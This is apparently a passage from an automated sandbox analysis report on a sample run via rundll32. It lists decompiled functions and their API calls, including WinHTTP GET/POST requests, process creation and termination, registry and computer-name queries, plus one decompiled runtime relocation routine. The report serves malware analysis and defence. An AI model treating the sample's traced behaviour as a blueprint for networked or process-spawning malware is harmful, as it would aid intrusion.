GetComputerNameExW.KERNEL32 ref: 00231DD7
calloc.MSVCRT ref: 00231DFE
realloc.MSVCRT ref: 00231E7E
free.MSVCRT ref: 00231EA9

Strings

NetBIOS , xrefs: 00231D29

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022D4A0, Relevance: 15.3, APIs: 12, Instructions: 291

APIs

rand.MSVCRT ref: 0022D4E8
calloc.MSVCRT ref: 0022D4FD
rand.MSVCRT ref: 0022D520
rand.MSVCRT ref: 0022D539
calloc.MSVCRT ref: 0022D624
strlen.MSVCRT ref: 0022D66C
malloc.MSVCRT ref: 0022D6ED

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

free.MSVCRT ref: 0022D7A9
free.MSVCRT ref: 0022D7BD
free.MSVCRT ref: 0022D7C5
malloc.MSVCRT ref: 0022D84D
free.MSVCRT ref: 0022D85E

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232EF0, Relevance: 15.2, APIs: 10, Instructions: 204

APIs

GetTickCount.KERNEL32 ref: 00232F04
calloc.MSVCRT ref: 00232FBA
calloc.MSVCRT ref: 00232FD0
memset.MSVCRT ref: 0023302A
memset.MSVCRT ref: 0023307E
memset.MSVCRT ref: 002330D2
memset.MSVCRT ref: 00233112
calloc.MSVCRT ref: 0023317B
free.MSVCRT ref: 00233198
free.MSVCRT ref: 002331A0

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022DD90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121

APIs

WinHttpConnect.WINHTTP ref: 0022DDC2
WinHttpOpenRequest.WINHTTP ref: 0022DE1F
WinHttpSendRequest.WINHTTP ref: 0022DE6A
WinHttpWriteData.WINHTTP ref: 0022DEAA
GetLastError.KERNEL32 ref: 0022DED0
WinHttpSendRequest.WINHTTP ref: 0022DF11

Strings

POST, xrefs: 0022DDE0
GET, xrefs: 0022DDDB

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022FAB0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96

APIs

Part of subcall function 0022F1E0: WaitForSingleObject.KERNEL32 ref: 0022F210
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Part of subcall function 0022F1E0: Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
Part of subcall function 0022F1E0: calloc.MSVCRT ref: 0022F268
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
calloc.MSVCRT ref: 0022FB61
realloc.MSVCRT ref: 0022FBC9
strlen.MSVCRT ref: 0022FBD9
memcpy.MSVCRT ref: 0022FBEC

Strings

meou, xrefs: 0022FBA9
re>, xrefs: 0022FC0F
<no , xrefs: 0022FB66

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232590, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 91

APIs

RegOpenKeyExW.ADVAPI32 ref: 002325CB
RegQueryValueExW.ADVAPI32 ref: 0023260B
calloc.MSVCRT ref: 00232633
RegCloseKey.ADVAPI32 ref: 00232669
FileTimeToSystemTime.KERNEL32(?), ref: 002326AB
calloc.MSVCRT ref: 002326C3
free.MSVCRT ref: 00232723

Strings

d, xrefs: 002326D7

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002218E0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54

APIs

fprintf.MSVCRT ref: 0022190C
fputc.MSVCRT ref: 0022192C
fprintf.MSVCRT ref: 00221946
fputc.MSVCRT ref: 00221977
fwrite.MSVCRT ref: 00221999

Strings

%p: top=%04d alloc=%04d: , xrefs: 002218FD
%07X, xrefs: 00221934

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022E860, Relevance: 11.4, APIs: 9, Instructions: 161

APIs

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

free.MSVCRT ref: 0022E8E4
free.MSVCRT ref: 0022E8F0
free.MSVCRT ref: 0022E8FC
free.MSVCRT ref: 0022E908

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Sleep.KERNEL32 ref: 0022E91E

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

free.MSVCRT ref: 0022EA98
free.MSVCRT ref: 0022EAA4
free.MSVCRT ref: 0022EAB0
free.MSVCRT ref: 0022EABC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022D210, Relevance: 11.4, APIs: 9, Instructions: 118

APIs

rand.MSVCRT ref: 0022D22F
calloc.MSVCRT ref: 0022D244
rand.MSVCRT ref: 0022D251

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

free.MSVCRT ref: 0022D2B3
calloc.MSVCRT ref: 0022D306
free.MSVCRT ref: 0022D33C
free.MSVCRT ref: 0022D344
free.MSVCRT ref: 0022D378
free.MSVCRT ref: 0022D384

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13CB0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 194

C-Code - Quality: 21%

			E63C13CB0() {
				void* _v16;
				signed int _v44;
				char* _v56;
				char _v60;
				void* _v61;
				signed int _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _t57;
				void* _t62;
				int _t66;
				signed int _t70;
				long _t72;
				signed int _t76;
				int _t77;
				int _t79;
				signed int _t82;
				signed char* _t86;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				int _t93;
				intOrPtr* _t95;
				intOrPtr _t97;
				signed int _t100;
				int _t101;
				struct _CRITICAL_SECTION _t106;
				signed int _t109;
				signed int _t110;
				signed int _t119;
				signed int _t124;
				intOrPtr _t128;
				signed int _t135;
				int _t137;
				intOrPtr _t138;
				int _t139;
				void* _t143;
				void* _t147;
				char** _t149;
				int* _t151;
				int* _t152;

				_t57 =  *0x63c3a7d4; // 0x1
				if(_t57 == 0) {
					_t143 = _t147;
					_push(_t124);
					 *0x63c3a7d4 = 1;
					_t62 = E63C14500(0x0000001e + (E63C14320() + _t58 * 0x00000002) * 0x00000004 & 0xfffffff0, _t90);
					 *0x63c3a7d8 = 0;
					_t149 = _t147 - 0x4c - _t62;
					 *0x63c3a7dc =  &_v61 & 0xfffffff0;
					_t66 = 0;
					__eflags = 0x63c395f4 - 7;
					if(0x63c395f4 <= 7) {
						L14:
						return _t66;
					} else {
						__eflags = 0x63c395f4 - 0xb;
						if(0x63c395f4 <= 0xb) {
							_t92 = 0x63c395f4;
							goto L26;
						} else {
							_t66 =  *0x63c395f4; // 0x0
							__eflags = _t66;
							if(_t66 != 0) {
								L15:
								_t92 = 0x63c395f4;
								goto L16;
							} else {
								_t66 =  *0x63c395f8; // 0x0
								__eflags = _t66;
								if(_t66 != 0) {
									goto L15;
								} else {
									_t124 =  *0x63c395fc; // 0x0
									_t92 = 0x63c39600;
									__eflags = _t124;
									if(_t124 == 0) {
										L26:
										_t135 =  *_t92;
										__eflags = _t135;
										if(_t135 != 0) {
											L16:
											__eflags = _t92 - 0x63c395f4;
											if(_t92 >= 0x63c395f4) {
												goto L14;
											} else {
												_v64 =  &_v56;
												do {
													_t16 = _t92 + 4; // 0x0
													_t97 =  *_t16;
													_t106 =  *_t92;
													_t92 = _t92 + 8;
													_t17 = _t97 + 0x63c00000; // 0x905a4d
													_t18 = _t97 + 0x63c00000; // 0x63c00000
													_v56 = _t106 +  *_t17;
													E63C13A60(_t18, 4, _v64);
													__eflags = _t92 - 0x63c395f4;
												} while (_t92 < 0x63c395f4);
												goto L19;
											}
										} else {
											_t36 = _t92 + 4; // 0x0
											_t96 =  *_t36;
											__eflags =  *_t36;
											if( *_t36 == 0) {
												goto L8;
											} else {
												goto L16;
											}
										}
									} else {
										_t92 = 0x63c395f4;
										L8:
										_t6 = _t92 + 8; // 0x0
										_t76 =  *_t6;
										__eflags = _t76 - 1;
										if(_t76 != 1) {
											L35:
											_v88 = _t76;
											 *_t149 = "  Unknown pseudo relocation protocol version %d.\n";
											_t77 = E63C13A00(_t96, _t105);
											0;
											0;
											_push(_t143);
											_push(_t124);
											_push(_t135);
											_t151 = _t149 - 0x1c;
											 *_t151 = 0x63c3a7e8;
											EnterCriticalSection(_t92);
											_t93 =  *0x63c3a7e0; // 0x0
											_t152 = _t151 - 4;
											__eflags = _t93;
											while(_t93 != 0) {
												 *_t152 =  *_t93;
												_t79 = TlsGetValue(??);
												_t152 = _t152 - 4;
												_t137 = _t79;
												_t77 = GetLastError();
												__eflags = _t77;
												if(_t77 == 0) {
													__eflags = _t137;
													if(_t137 != 0) {
														 *_t152 = _t137;
														_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 4))))();
													}
												}
												_t93 =  *(_t93 + 8);
												__eflags = _t93;
											}
											 *_t152 = 0x63c3a7e8;
											LeaveCriticalSection(??);
											return _t77;
										} else {
											_t95 = _t92 + 0xc;
											__eflags = _t95 - 0x63c395f4;
											if(_t95 < 0x63c395f4) {
												do {
													_t7 = _t95 + 8; // 0x0
													_t109 =  *_t7 & 0x000000ff;
													_t8 = _t95 + 4; // 0x332e382e
													_t128 =  *_t8;
													_t101 =  *_t95;
													_t9 = _t128 + 0x63c00000; // 0x96ee382e
													_t86 = _t9;
													__eflags = _t109 - 0x10;
													_t10 = _t101 + 0x63c00000; // 0x905a4d
													_t138 =  *_t10;
													if(_t109 == 0x10) {
														_t110 =  *(_t128 + 0x63c00000) & 0x0000ffff;
														_v64 = _t110;
														__eflags = _v64;
														_t111 =  <  ? _t110 | 0xffff0000 : _t110;
														_t112 = ( <  ? _t110 | 0xffff0000 : _t110) - 0x63c00000;
														_t113 = ( <  ? _t110 | 0xffff0000 : _t110) - 0x63c00000 - _t101;
														_t139 = _t138 + ( <  ? _t110 | 0xffff0000 : _t110) - 0x63c00000 - _t101;
														__eflags = _t139;
														_v56 = _t139;
														_v64 =  &_v56;
														E63C13A60(_t86, 2,  &_v56);
														goto L30;
													} else {
														__eflags = _t109 - 0x20;
														if(_t109 == 0x20) {
															_v56 = _t138 +  *_t86 - 0x63c00000 -  *_t95;
															_v64 =  &_v56;
															E63C13A60(_t86, 4,  &_v56);
															goto L30;
														} else {
															__eflags = _t109 - 8;
															if(_t109 == 8) {
																_t119 =  *_t86 & 0x000000ff;
																__eflags =  *_t86;
																_t120 =  <  ? _t119 | 0xffffff00 : _t119;
																_t121 = ( <  ? _t119 | 0xffffff00 : _t119) - 0x63c00000;
																_t122 = ( <  ? _t119 | 0xffffff00 : _t119) - 0x63c00000 - _t101;
																_t141 = _t138 + ( <  ? _t119 | 0xffffff00 : _t119) - 0x63c00000 - _t101;
																_v56 = _t138 + ( <  ? _t119 | 0xffffff00 : _t119) - 0x63c00000 - _t101;
																_v64 =  &_v56;
																E63C13A60(_t86, 1,  &_v56);
																goto L30;
															} else {
																_v88 = _t109;
																 *_t149 = "  Unknown pseudo relocation bit size %d.\n";
																_v56 = 0;
																_t66 = E63C13A00(_t101, _t109);
																goto L14;
															}
														}
													}
													goto L43;
													L30:
													_t95 = _t95 + 0xc;
													__eflags = _t95 - 0x63c395f4;
												} while (_t95 < 0x63c395f4);
												L19:
												_t66 =  *0x63c3a7d8; // 0x0
												_t92 = 0;
												__eflags = _t66;
												if(_t66 > 0) {
													do {
														_t135 = _t92 + _t92 * 2;
														_t70 =  *0x63c3a7dc; // 0x1fe160
														_t124 = _t135 * 4;
														_t66 = _t70 + _t124;
														_t105 =  *_t66;
														__eflags =  *_t66;
														if( *_t66 == 0) {
															goto L21;
														} else {
															_v84 = 0x1c;
															_v88 = _v64;
															_t27 = _t66 + 4; // 0x690073
															 *_t149 =  *_t27;
															_t72 = VirtualQuery(??, ??, ??);
															_t149 = _t149 - 0xc;
															__eflags = _t72;
															if(_t72 == 0) {
																_t100 =  *0x63c3a7dc; // 0x1fe160
																_t96 = _t100 + _t124;
																__eflags = _t96;
																_t49 = _t96 + 4; // 0x690073
																_v84 =  *_t49;
																_t51 = _t96 + 8; // 0x650064
																_t52 =  *_t51 + 8; // 0x222ceaa
																 *_t149 = "  VirtualQuery failed for %d bytes at address %p";
																_v88 =  *_t52;
																_t76 = E63C13A00(_t96, _t105);
																goto L35;
															} else {
																_v80 =  &_v60;
																_t82 =  *0x63c3a7dc; // 0x1fe160
																_v84 =  *((intOrPtr*)(_t82 + _t135 * 4));
																_v88 = _v44;
																 *_t149 = _v56;
																_t66 = VirtualProtect(??, ??, ??, ??);
																_t149 = _t149 - 0x10;
																goto L21;
															}
														}
														goto L43;
														L21:
														_t92 = _t92 + 1;
														__eflags = _t92 -  *0x63c3a7d8; // 0x0
													} while (__eflags < 0);
												} else {
												}
											}
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					return _t57;
				}
				L43:
			}

0x63c13cb0
0x63c13cb7
0x63c13cc1
0x63c13cc3
0x63c13cc9
0x63c13ce5
0x63c13cea
0x63c13cf4
0x63c13cfd
0x63c13d07
0x63c13d0c
0x63c13d0f
0x63c13db0
0x63c13db7
0x63c13d15
0x63c13d15
0x63c13d18
0x63c13e83
0x00000000
0x63c13d1e
0x63c13d1e
0x63c13d23
0x63c13d25
0x63c13db8
0x63c13db8
0x00000000
0x63c13d2b
0x63c13d2b
0x63c13d30
0x63c13d32
0x00000000
0x63c13d38
0x63c13d38
0x63c13d3e
0x63c13d43
0x63c13d45
0x63c13e88
0x63c13e88
0x63c13e8a
0x63c13e8c
0x63c13dbd
0x63c13dbd
0x63c13dc3
0x00000000
0x63c13dc5
0x63c13dc8
0x63c13dd0
0x63c13dd0
0x63c13dd0
0x63c13dd3
0x63c13dd5
0x63c13dd8
0x63c13dde
0x63c13de9
0x63c13def
0x63c13df4
0x63c13df4
0x00000000
0x63c13dd0
0x63c13e92
0x63c13e92
0x63c13e92
0x63c13e95
0x63c13e97
0x00000000
0x63c13e9d
0x00000000
0x63c13e9d
0x63c13e97
0x63c13d4b
0x63c13d4b
0x63c13d50
0x63c13d50
0x63c13d50
0x63c13d53
0x63c13d56
0x63c13f64
0x63c13f64
0x63c13f68
0x63c13f6f
0x63c13f7a
0x63c13f7e
0x63c13f80
0x63c13f81
0x63c13f82
0x63c13f84
0x63c13f87
0x63c13f8e
0x63c13f94
0x63c13f9a
0x63c13fa9
0x63c13fab
0x63c13fb2
0x63c13fb5
0x63c13fb7
0x63c13fba
0x63c13fbc
0x63c13fbe
0x63c13fc0
0x63c13fc2
0x63c13fc4
0x63c13fc9
0x63c13fcc
0x63c13fcc
0x63c13fc4
0x63c13fce
0x63c13fd1
0x63c13fd1
0x63c13fd5
0x63c13fdc
0x63c13fec
0x63c13d5c
0x63c13d5c
0x63c13d5f
0x63c13d65
0x63c13d67
0x63c13d67
0x63c13d67
0x63c13d6b
0x63c13d6b
0x63c13d6e
0x63c13d70
0x63c13d70
0x63c13d76
0x63c13d79
0x63c13d79
0x63c13d7f
0x63c13ea2
0x63c13eab
0x63c13eb5
0x63c13eba
0x63c13ebd
0x63c13ec3
0x63c13eca
0x63c13eca
0x63c13ecf
0x63c13ed2
0x63c13ed5
0x00000000
0x63c13d85
0x63c13d85
0x63c13d88
0x63c13f32
0x63c13f35
0x63c13f38
0x00000000
0x63c13d8e
0x63c13d8e
0x63c13d91
0x63c13eee
0x63c13ef9
0x63c13efc
0x63c13eff
0x63c13f05
0x63c13f0c
0x63c13f11
0x63c13f14
0x63c13f17
0x00000000
0x63c13d97
0x63c13d97
0x63c13d9b
0x63c13da2
0x63c13da9
0x00000000
0x63c13da9
0x63c13d91
0x63c13d88
0x00000000
0x63c13eda
0x63c13eda
0x63c13edd
0x63c13edd
0x63c13dfc
0x63c13dfc
0x63c13e01
0x63c13e03
0x63c13e05
0x63c13e1b
0x63c13e1b
0x63c13e1e
0x63c13e23
0x63c13e2a
0x63c13e2c
0x63c13e2e
0x63c13e30
0x00000000
0x63c13e32
0x63c13e35
0x63c13e3d
0x63c13e41
0x63c13e44
0x63c13e47
0x63c13e4d
0x63c13e50
0x63c13e52
0x63c13f3f
0x63c13f45
0x63c13f45
0x63c13f47
0x63c13f4a
0x63c13f4e
0x63c13f51
0x63c13f54
0x63c13f5b
0x63c13f5f
0x00000000
0x63c13e58
0x63c13e5b
0x63c13e5f
0x63c13e67
0x63c13e6e
0x63c13e75
0x63c13e78
0x63c13e7e
0x00000000
0x63c13e7e
0x63c13e52
0x00000000
0x63c13e10
0x63c13e10
0x63c13e13
0x63c13e13
0x00000000
0x63c13e07
0x63c13e05
0x00000000
0x63c13d65
0x63c13d56
0x63c13d45
0x63c13d32
0x63c13d25
0x63c13d18
0x63c13cb9
0x63c13cb9
0x63c13cb9
0x00000000

APIs

Part of subcall function 63C13A00: fwrite.MSVCRT ref: 63C13A2B
Part of subcall function 63C13A00: vfprintf.MSVCRT ref: 63C13A47
Part of subcall function 63C13A00: abort.MSVCRT ref: 63C13A4C

Part of subcall function 63C13A60: VirtualQuery.KERNEL32 ref: 63C13B0A
Part of subcall function 63C13A60: VirtualQuery.KERNEL32 ref: 63C13B43
Part of subcall function 63C13A60: memcpy.MSVCRT ref: 63C13B71
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13BA5
Part of subcall function 63C13A60: memcpy.MSVCRT ref: 63C13BBD
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13BEB
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13C35
Part of subcall function 63C13A60: GetLastError.KERNEL32 ref: 63C13C4A

VirtualQuery.KERNEL32 ref: 63C13E47
VirtualProtect.KERNEL32 ref: 63C13E78

Strings

Unknown pseudo relocation protocol version %d., xrefs: 63C13F68
VirtualQuery failed for %d bytes at address %p, xrefs: 63C13C77, 63C13CA3, 63C13F54
%-=wOm>w, xrefs: 63C13C35, 63C13E78
Unknown pseudo relocation bit size %d., xrefs: 63C13D9B

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C01040, Relevance: 10.6, APIs: 7, Instructions: 132

APIs

Sleep.KERNEL32(?,00000000,?,63C01325), ref: 63C01077
_amsg_exit.MSVCRT ref: 63C010A4
Sleep.KERNEL32(?,00000000,?,63C01325), ref: 63C010EF
free.MSVCRT ref: 63C011BB
_initterm.MSVCRT ref: 63C01229
_amsg_exit.MSVCRT ref: 63C0123A
_initterm.MSVCRT ref: 63C01253

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 0022F88C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107

APIs

CloseHandle.KERNEL32 ref: 0022F843
CloseHandle.KERNEL32 ref: 0022F857
free.MSVCRT ref: 0022F863
CloseHandle.KERNEL32 ref: 0022FA9E

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

free.MSVCRT ref: 0022F87A
CreateProcessW.KERNEL32 ref: 0022F9E0
CloseHandle.KERNEL32 ref: 0022FA0A
CreateThread.KERNEL32 ref: 0022FA5E
CloseHandle.KERNEL32 ref: 0022FA6E

Part of subcall function 00230D40: GetModuleHandleW.KERNEL32 ref: 00230D97
Part of subcall function 00230D40: GetProcAddress.KERNEL32 ref: 00230DB7
Part of subcall function 00230D40: GetProcAddress.KERNEL32 ref: 00230DCC

Strings

D, xrefs: 0022F977

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
